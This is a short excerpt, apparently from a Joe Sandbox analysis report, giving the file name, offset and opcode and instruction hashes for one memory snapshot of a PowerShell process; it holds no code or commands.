                                  • Source File: 00000000.00000002.1449154927.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7ffaac460000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5241b6d0ed2616d314d2171a639255a1cb75339fcdaebc7275a0b87dda614da9
                                  • Instruction ID: 900155014adbbc367d52563f6baed4c8dc061a73dcc0eaf45bb2bcffd0d6f1be
                                  • Opcode Fuzzy Hash: 5241b6d0ed2616d314d2171a639255a1cb75339fcdaebc7275a0b87dda614da9
                                  • Instruction Fuzzy Hash: 7F01677111CB4C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3665D636E881CB45